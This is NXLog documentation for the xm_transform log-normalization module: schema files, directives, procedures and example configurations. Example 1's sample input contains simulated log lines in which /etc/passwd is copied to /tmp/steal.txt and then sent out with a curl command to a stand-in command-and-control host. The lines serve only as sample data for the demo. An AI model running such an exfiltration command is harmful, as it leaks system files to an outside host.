NXLog Legacy Documentation

Transform (xm_transform)

This module allows normalizing log data according to a specified schema. It accepts file-based schemas in JSON format and supports dynamically setting the schema file.

The module is intended to be used with the JSON (xm_json) extension.

To examine the supported platforms, see the list of installer packages in the Available Modules chapter.

Schema definition

You must define one or more event schemas in JSON format and save each schema in a separate file. The schema can include constant strings and event fields.

Basic event schema
{
  "agent_name": "NXLog Agent", (1)
  "message": "$raw_event" (2)
}
1 Sets the agent_name property to NXLog Agent for every log record.
2 Sets the message property to the value of the $raw_event core field.

The schema can also contain nested JSON objects. For example, the following schema includes a metadata property containing an object.

Schema with nested object
{
  "message": "$raw_event",
  "metadata": {
    "agent": {
      "name": "NXLog Agent",
      "ingestion": "$EventReceivedTime"
    }
  }
}

See Event records and fields for more information on how NXLog parses log records into fields.

Configuration

The xm_transform module accepts the following directives in addition to the common module directives.

Optional directives

Schema

Specify the path to a schema file. NXLog formats log records using this schema when you process them with this extension.

SchemaDir

Specify the path to a folder containing your schema files. NXLog looks for the schema files specified by the Schema and SchemaMap directives in this folder. The default is the folder that contains the configuration file where the xm_transform instance is defined.

SchemaMap

Use this directive to specify a map of names and the corresponding schema file location. You can use these names when dynamically setting the schema with the set_schema() procedure.

NXLog drops events that do not match any schema. We recommend always specifying a default schema to avoid data loss.

See Setting the schema dynamically below for an example.

Procedures

The following procedures are exported by xm_transform.

process();

This procedure processes the log record and transforms it according to the module instance settings.

set_schema(string schema_name);

Sets the schema file, overriding the default one. The schema_name must match a schema name defined by the SchemaMap directive.

Examples

Example 1. Transforming logs using a schema file

This configuration collects Linux system logs from a file and transforms log records according to a schema file.

nxlog.conf
<Extension transform>
    Module    xm_transform
    Schema    'schemas/default.json' (1)
</Extension>

<Extension json>
    Module    xm_json
</Extension>

<Input system_logs>
    Module    im_file
    File      '/var/log/syslog'
    <Exec>
        transform->process(); (2)
        to_json(); (3)
    </Exec>
</Input>
1 Defines the path of the schema file. The path is relative to the NXLog configuration folder.
2 Normalizes log records according to the schema file defined in the Schema directive.
3 Calls the to_json() procedure of xm_json to convert the record to JSON format.

The following is a basic schema file compatible with log events collected by the im_file input module. This module populates the core fields only.

default.json
{
  "Event": "$raw_event",
  "Metadata": {
    "Type": "GENERIC",
    "IngestionTime": "$EventReceivedTime"
  }
}
Input sample
2024-09-26 16:05:47 [100]: File "/etc/passwd" 512 bytes was copied to "/tmp/steal.txt".
2024-09-26 16:05:47 [100]: Process 123 "/usr/bin/curl" with command line "-d @/tmp/steal.txt http://example-cc.bot".
2024-09-26 16:05:47 [100]: File "/tmp/steal" 512 bytes was deleted.
Output sample
{
  "Event": "2024-09-26 16:05:47 [100]: File \"/etc/passwd\" 512 bytes was copied to \"/tmp/steal.txt\".",
  "Metadata": {
    "Type": "GENERIC",
    "IngestionTime": "2024-09-26T16:06:00.984034+02:00"
  }
}
Example 2. Setting the schema dynamically

This configuration collects logs from a file and transforms log records according to the event type. It defines three event schemas: copy, delete, and spawn. It also sets a default schema for events that do not match any of the conditions.

<Extension transform>
    Module       xm_transform
    SchemaDir    'schemas/'  (1)
    
    <SchemaMap>  (2)
      copy       file-copy.json
      delete     file-delete.json
      spawn      process-create.json
      default    default.json
    </SchemaMap>

    <Exec>  (3)
      if ($raw_event =~ /File "(.+)" (\d+) bytes was deleted/) {
        $FileName = $1;
        $FileSize = $2;
        set_schema("delete");
      }
      else if ($raw_event =~ /File "(.+)" (\d+) bytes was copied to "(.+)"/) {
        $PrevFileName = $1;
        $PrevFileSize = $2;
        $FileName = $3;
        set_schema("copy");
      }
      else if ($raw_event =~ /Process (\d+) "(.+)" with command line "(.+)"/) {
        $NewProcessID = $1;
        $FileName = $2;
        $Args = $3;
        set_schema("spawn");
      }
      else
      {
        set_schema("default"); (4)
      }
    </Exec>
</Extension>

<Extension json>
    Module       xm_json
</Extension>

<Input access_log>
    Module       im_file
    File         '/var/log/access_log'
    <Exec>
        transform->process(); (5)
        to_json(); (6)
    </Exec>
</Input>
1 Defines the path of the directory containing the schema files. The path is relative to the NXLog configuration folder.
2 Maps names to schema files. You use the names when dynamically setting the schema with set_schema().
3 Logic that sets the appropriate schema dynamically. It uses regular expressions to parse log events.
4 It uses the default schema for log events that do not match any of the regular expressions.
5 Normalizes log records according to the SchemaMap.
6 Calls the to_json() procedure of xm_json to convert the record to JSON format.